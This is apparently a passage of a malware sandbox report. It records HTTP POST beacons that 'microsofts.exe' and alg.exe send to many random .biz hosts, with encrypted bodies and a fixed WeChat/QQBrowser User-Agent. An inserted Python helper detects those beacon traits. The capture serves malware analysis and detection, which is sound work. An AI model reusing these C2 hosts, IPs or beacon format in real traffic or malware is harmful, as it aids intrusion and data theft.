User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:03:45.112466097 CET | 778 | OUT | Data Raw: 5c 21 2f 61 6c 56 a5 01 fe 02 00 00 07 88 cf 9c 2e d6 93 5f 04 71 fc 6c b5 f4 d6 39 fe 59 86 96 4f 87 d9 ea 6e 24 b8 c3 57 0e a7 94 46 85 fd 9f 89 5e 9f 1a 45 83 f3 94 11 0a 87 b9 53 85 90 0d 36 42 47 70 c8 a5 54 d3 18 88 6b aa 67 53 f4 ff 40 2c
Data Ascii: \!/alV._ql9YOn$WF^ES6BGpTkgS@,%/%E"IW.C.u-Db6&9[/bhlp]Mgt>\[H"3PXyTO.?"m$L3-O}T*8'f7!J;u!$B-&Lu@X"
Nov 5, 2024 17:03:45.765846014 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=01b470141b693b954c34d9cc126cfb07|173.254.250.76|1730822625|1730822625|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 59674 | 54.244.188.177 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:45.253659010 CET | 355 | OUT | POST /qunavwbhgmi HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: dwrqljrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:45.253686905 CET | 828 | OUT | Data Raw: 1a d8 78 79 84 2c 0c 56 30 03 00 00 58 05 4f cc e2 1b 4d 4f 76 9d 95 e1 80 55 0b 83 fe a7 86 c8 11 1d 3b 14 09 46 18 a8 b8 46 72 bc 3a c1 49 a8 99 8c 52 9e c7 d6 c3 f7 64 49 e7 df 99 59 5e 64 e7 80 b7 09 d1 a7 5f 25 f6 66 44 83 df 27 70 ec 89 5f
    Data Ascii: xy,V0XOMOvU;FFr:IRdIY^d_%fD'p_sK8:a|QiIrb'epn&e.>;?10}a nbEE;<dl|uD}|2eapB.8>=w$gY{'(jZUK+4
Nov 5, 2024 17:03:46.098514080 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8ac1c596a1fad96e084cea5f1a96fc3e|173.254.250.76|1730822625|1730822625|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 59680 | 18.141.10.107 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:46.004925966 CET | 349 | OUT | POST /boysd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: acwjcqqv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:46.004947901 CET | 778 | OUT | Data Raw: 05 07 3d dc 6a ed 90 12 fe 02 00 00 24 73 11 31 7a 29 b4 94 ef 2d f7 18 78 75 66 08 aa 92 83 ef c1 42 3a bf 32 89 65 fe 00 49 5d 38 cb 5f 58 58 dc 53 b8 10 af 24 37 69 a1 80 3e 32 fd 90 85 da 85 b7 90 ce 65 b1 6b 28 32 74 1f d8 35 69 53 c7 a4 9c
    Data Ascii: =j$s1z)-xufB:2eI]8_XXS$7i>2ek(2t5iSnS{ox#)up:Cgq:/.uQl5Gb`gJ)%m&3XpM+26*axvx^bE?cqLo?KHA`w8HBz3{i
Nov 5, 2024 17:03:47.453851938 CET | 416 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:47 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=f806e31b64f283494e2e8966f66ea62a|173.254.250.76|1730822627|1730822627|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 59681 | 35.164.78.200 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:03:46.141329050 CET | 353 | OUT | POST /eoodskndsap HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: nqwjmb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:46.141366959 CET | 828 | OUT | Data Raw: ca 4b c1 63 9f f1 96 c4 30 03 00 00 3e c1 f0 e4 e1 b0 04 1b e3 20 ed b5 7d 09 51 40 f2 b5 8f af 6f 26 19 3f 6a 9e 8c f4 1c cc 38 bf eb 3a c6 6f 46 77 f9 b3 22 aa 46 07 35 99 f3 43 43 c3 6b e6 b5 06 d6 64 e7 84 88 24 ac 5a 25 12 f7 cc cc 59 5e 6c
    Data Ascii: Kc0> }Q@o&?j8:oFw"F5CCkd$Z%Y^lA*ABB[~VIF,4QN,[Q1&E/^1*<.7-c"xr1q/9n 1cq1-c{J"7\g"+J'I5&
Nov 5, 2024 17:03:46.959660053 CET | 414 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:46 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=1e3a3b2cd92cd16f2806edf851d6485b|173.254.250.76|1730822626|1730822626|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              60192.168.2.5596873.94.10.34801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010684013 CET358OUTPOST /ccgjbojtfwpjh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.010766983 CET828OUTData Raw: 1c be f8 98 bc 77 47 7f 30 03 00 00 ad a2 bf ac ad e3 3e a2 c9 7e 12 11 fd 2a 7a 9a c4 f3 4d 7e f4 b5 24 e0 73 12 a5 18 da e3 ec db b4 9b 51 d3 ef 77 bc a1 61 be d9 7d ff 17 5b ba 5e fe e9 ca c1 ab df 38 95 3a 02 ba d1 cf 76 86 2a f3 c3 72 e0 cc
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: wG0>~*zM~$sQwa}[^8:v*r5VR$>F'Q+p&AJuMP9RTX9=W)bq4)*(!1un'EHgiyZ@@N$=Y3!=]]MD>NwIAcUpC,&fDxn/
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.691274881 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=b9ae4358c18fe369ae0ccc2308bc8033|173.254.250.76|1730822627|1730822627|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              61192.168.2.55969118.246.231.120801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698206902 CET351OUTPOST /tqpwjhvmbc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.698240042 CET778OUTData Raw: 07 8a 6e 2b a7 46 a0 9e fe 02 00 00 a9 0f ce 24 da 49 70 a9 b3 7d 61 55 66 a7 0b 6d 0c b4 a3 77 c5 db c7 78 ac f9 7e 2f 12 27 2d d7 a4 dd 75 02 e2 ee 78 a4 0d 00 73 6a 69 89 70 85 81 6e 6d 44 37 63 7b e1 60 14 37 54 84 d3 a9 e0 66 4b 1e 67 92 b5
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n+F$Ip}aUfmwx~/'-uxsjipnmD7c{`7TfKgl=?:'_u3mINlL%z2?Z<##,tfHYx}w05e1k&Ji-\LsnJs#<3w_]$p*;1$g_[#
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.549619913 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ee7a1b3df35328cb68bb12c4f759f00c|173.254.250.76|1730822628|1730822628|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              62192.168.2.559693165.160.13.20801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.760854006 CET345OUTPOST /couv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.760989904 CET828OUTData Raw: a3 82 61 00 5e c8 6b 8d 30 03 00 00 38 45 fd 12 a0 b1 14 07 8f f6 5f 30 01 5e 65 d4 c6 6c ba d9 37 44 e0 af 8f 88 be 3e cf 4e df be ef 92 0a ea 13 47 ea df 20 fe 6d c9 11 92 b5 40 0f 0a 8b 67 6d 9f a2 9a cf ea 56 3f 98 f8 08 09 49 53 0f 6b 00 1c
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: a^k08E_0^el7D>NG m@gmV?ISkJ`ckzZ^pk:WDvP`VjC[0n(JFpcu#Pp6U?']H#|]qCgutKa<}bQhq%#hBfQ#%C
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:48.567636013 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
63          192.168.2.5  59698        165.160.13.20   80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:03:48.632597923 CET  343                OUT
    POST /wa HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: myups.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:48.632626057 CET  828                OUT
    Data Raw: 21 f1 44 f6 0e a9 e6 f9 30 03 00 00 09 29 79 21 00 27 3d 8e f5 c8 74 89 93 05 72 73 e3 8a 6d e7 4b 3c 22 03 b7 10 1a b1 a4 70 5d 0d 53 bb 02 f7 34 03 fa 3c 60 17 c9 67 32 5a 0f dd 8f eb e7 69 9f c0 80 1e 90 43 c1 3b 1e da fe 73 ca e8 99 46 6c 98
    Data Ascii: !D0)y!'=trsmK<"p]S4<`g2ZiC;sFlZ_@3P"MJJ*iea&HM'(T!>6Vu4oeGs!L_j\7MkY"7]DM3*&Ds@cd85 {Ac e=K;
Nov 5, 2024 17:03:49.436620951 CET  170                IN
    HTTP/1.1 200 OK
    Date: Tue, 05 Nov 2024 16:03:49 GMT
    Content-Length: 94
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
64          192.168.2.5  59701        18.208.156.248  80                1492  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:03:48.908615112 CET  354                OUT
    POST /nmtgacidyy HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: yauexmxk.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 5, 2024 17:03:48.908642054 CET  778                OUT
    Data Raw: ab 0e 71 d1 88 91 d8 11 fe 02 00 00 14 07 54 bd 2f 80 9a bb 67 8f 8d a2 cb 55 e3 e5 3c 60 52 dd d0 54 d0 d5 67 74 3a 50 d0 2e 94 82 71 35 32 3f 86 96 7a 27 37 8b cb d1 e8 cc 3a 3e 53 8c 85 f1 ce 9c 56 e0 37 28 a5 d7 8d af ed d2 59 bb 34 7b 72 ad
    Data Ascii: qT/gU<`RTgt:P.q52?z'7:>SV7(Y4{rnc,ZYsUj)xDyOEFCt 2l -&tqUrs$KuDEz'3B+T=jaFl"]]<8cNSd\`)YX"qg|u@*aV{
Nov 5, 2024 17:03:49.581597090 CET  416                IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:49 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=bd0acfdae82580ba2637ae47e28ee200|173.254.250.76|1730822629|1730822629|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
65          192.168.2.5  59705        54.244.188.177  80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp                           Bytes transferred  Direction  Data
Nov 5, 2024 17:03:49.503246069 CET  349                OUT
    POST /dkbm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: oshhkdluh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Nov 5, 2024 17:03:49.503273964 CET  828                OUT
    Data Raw: 23 7d 0e ea 5c e4 dd ae 30 03 00 00 a8 31 0d 3d be 4e a3 87 0b 5c da 14 d6 c0 ba e7 17 c2 b4 48 72 a1 b0 88 0a 89 f0 00 53 e0 ff 78 46 fd df c6 ef db b3 50 25 6f 09 b9 a1 cb bf 87 16 e9 22 c4 a0 6a e2 27 6b 7e 53 9c e7 75 02 d1 18 c7 e7 0f 31 dc
    Data Ascii: #}\01=N\HrSxFP%o"j'k~Su1e:uQ.ptNV1]>G|eQ4~#}/64rJ5?!=wF>7=[G1qG3wl_J.oW1Ef|\zDOblb>[(5|
Nov 5, 2024 17:03:50.342863083 CET  417                IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 05 Nov 2024 16:03:50 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8617e0bb451f90aeb2821df5527af9ba|173.254.250.76|1730822630|1730822630|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
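
Triage helper for the four POST beacons in sessions 63 to 66, added here as a worked example; it is not Joe Sandbox output and not code from the analysed sample. It rebuilds each request from the header lines shown in the report and the first 12 body bytes as captured (the rest of each body is zero-padded, since the full ciphertext is not reproduced in the report), then flags the traits that recur in all four: a POST carrying the identical WeChat/QQBrowser User-Agent, a short .biz host, the fixed no-cache / Keep-Alive header trio, and a body whose bytes 8..11 read as a little-endian uint32 equal to Content-Length minus 12 (0x330 = 816 for the 828-byte bodies, 0x2fe = 766 for the 778-byte ones). The role of the first 8 body bytes is not established by the report; treating the first 12 bytes as a header with a length field, and the .biz hostname pattern, are assumptions of this example, not findings of the sandbox.

```python
"""Beacon triage for the HTTP sessions captured above (added example, not Joe Sandbox code)."""
import re
import struct
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# User-Agent string that appears verbatim in every captured request.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")

# Assumption: the C2 hostnames are short, letter-only second-level labels under .biz.
BIZ_HOST_RE = re.compile(r"[a-z]{4,16}\.biz")


@dataclass
class Beacon:
    host: str
    path: str
    content_length: int
    body_len_field: Optional[int]      # uint32 LE at body offset 8, if the body is long enough
    reasons: List[str] = field(default_factory=list)


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into (method, path, lowercase header map, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def triage(raw: bytes) -> Beacon:
    """Score one request against the traits shared by the captured beacons."""
    method, path, headers, body = parse_http_request(raw)
    clen = int(headers.get("content-length", "0"))
    host = headers.get("host", "")
    beacon = Beacon(host, path, clen, None)

    if method == "POST" and headers.get("user-agent") == BEACON_UA:
        beacon.reasons.append("post-with-beacon-ua")
    if BIZ_HOST_RE.fullmatch(host):
        beacon.reasons.append("short-biz-host")          # heuristic, see lead-in
    if (headers.get("cache-control") == "no-cache"
            and headers.get("pragma") == "no-cache"
            and headers.get("connection") == "Keep-Alive"):
        beacon.reasons.append("fixed-cache-headers")
    if len(body) >= 12:
        # Assumed 12-byte prefix: 8 unknown bytes, then a uint32 LE length of the rest.
        beacon.body_len_field = struct.unpack_from("<I", body, 8)[0]
        if beacon.body_len_field == clen - 12 == len(body) - 12:
            beacon.reasons.append("12-byte-header-length-field")
    return beacon


def build_sample(host: str, path: str, body_prefix_hex: str, content_length: int) -> bytes:
    """Constructed request: real header lines from the report, the first 12 captured body
    bytes, and zero padding in place of the remaining ciphertext."""
    body = bytes.fromhex(body_prefix_hex)
    body += b"\x00" * (content_length - len(body))
    head = (f"POST {path} HTTP/1.1\r\n"
            "Cache-Control: no-cache\r\n"
            "Connection: Keep-Alive\r\n"
            "Pragma: no-cache\r\n"
            f"Host: {host}\r\n"
            f"User-Agent: {BEACON_UA}\r\n"
            f"Content-Length: {content_length}\r\n\r\n")
    return head.encode("ascii") + body


# Host, path, first 12 body bytes and Content-Length, taken from sessions 63 to 66 above.
SAMPLES = [
    ("myups.biz",     "/wa",         "21f144f60ea9e6f930030000", 828),
    ("yauexmxk.biz",  "/nmtgacidyy", "ab0e71d18891d811fe020000", 778),
    ("oshhkdluh.biz", "/dkbm",       "237d0eea5ce4ddae30030000", 828),
    ("iuzpxe.biz",    "/ghraajhdo",  "1e15fa2196298e2efe020000", 778),
]


def triage_all() -> List[Beacon]:
    return [triage(build_sample(*s)) for s in SAMPLES]


if __name__ == "__main__":
    for b in triage_all():
        print(f"{b.host:14} {b.path:12} clen={b.content_length} len_field={b.body_len_field} {b.reasons}")
```

The length-field check is the most specific of the four because it depends on body layout rather than on strings an operator can change; if a later sample keeps the 12-byte prefix but rotates the User-Agent, that check still fires while the UA match does not.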


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              66192.168.2.55970813.251.16.150801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.841599941 CET351OUTPOST /ghraajhdo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:49.841625929 CET778OUTData Raw: 1e 15 fa 21 96 29 8e 2e fe 02 00 00 e8 4a c7 5d 7f 2b 8e d1 08 62 45 25 27 a7 17 bc 49 f9 1f a9 ad d9 6f 67 9f cb 5b 19 e7 6a 2e 58 1d e6 75 c5 38 08 5c 2f 77 51 30 34 33 98 ae b9 6c 53 34 48 8e 11 d7 66 15 ed 84 49 5b d4 5c cc 29 da 2f 8e f0 9a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !).J]+bE%'Iog[j.Xu8\/wQ043lS4HfI[\)/r3kyV|'ew]+$m9uIeG55=bl=QUsSj%|1)8<]e[B_ca"l$fl0]L++N]bgGL+wh
Nov 5, 2024 17:03:51.279618025 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:03:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1f4320a83f214729d52b5385917d5b07|173.254.250.76|1730822631|1730822631|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.5 | 59713 | 208.100.26.245 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe
